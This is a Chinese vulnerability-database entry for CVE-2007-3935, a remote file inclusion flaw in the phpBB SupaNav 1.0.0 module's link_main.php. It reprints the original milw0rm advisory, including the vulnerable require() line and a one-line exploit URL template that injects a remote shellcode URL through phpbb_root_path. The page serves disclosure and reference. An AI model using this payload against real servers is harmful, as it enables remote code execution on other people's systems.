phpBB SupaNav Link_main.php 文件漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113324 漏洞类型 未知
发布时间 2007-07-18 更新时间 2007-07-20
CVE编号 CVE-2007-3935 CNNVD-ID CNNVD-200707-376
漏洞平台 PHP CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/4197
https://www.securityfocus.com/bid/85493
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-376
|漏洞详情
phpBBSupaNav1.0.0模块的link_main.php中存在PHP远程文件包含漏洞。远程攻击者可以借助phpbb_root_path参数中的一个URL,执行任意PHP代码。
|漏洞EXP
phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability


Vendor: http://www.phpbbhacks.com/download/8003

Download: http://www.phpbbhacks.com/load.php?id=8003

Founder: bd0rk

Website 1: www.soh-crew.it.tt

Website 2: www.school-of-hack.net

Contact: bd0rk[at]hackermail.com

ICQ: 249-613-511

Greetings: str0ke, TheJT, rgod, Kacper, GolD_M

Vulnerable Code in link_main.php:

--------------------------------------------------------------------------------------

require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

--------------------------------------------------------------------------------------

$phpbb_root_path is not declared before require

[+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode]


####The 18 years old german Hacker bd0rk####

# milw0rm.com [2007-07-18]
|受影响的产品
Phpbb Supanav 1.0.0
|参考资料

来源:MILW0RM
名称:4197
链接:http://www.milw0rm.com/exploits/4197
来源:OSVDB
名称:36275
链接:http://osvdb.org/36275
来源:XF
名称:supanav-linkmain-file-include(35485)
链接:http://xforce.iss.net/xforce/xfdb/35485
来源:VUPEN
名称:ADV-2007-2575
链接:http://www.frsirt.com/english/advisories/2007/2575
来源:SECUNIA
名称:26127
链接:http://secunia.com/advisories/26127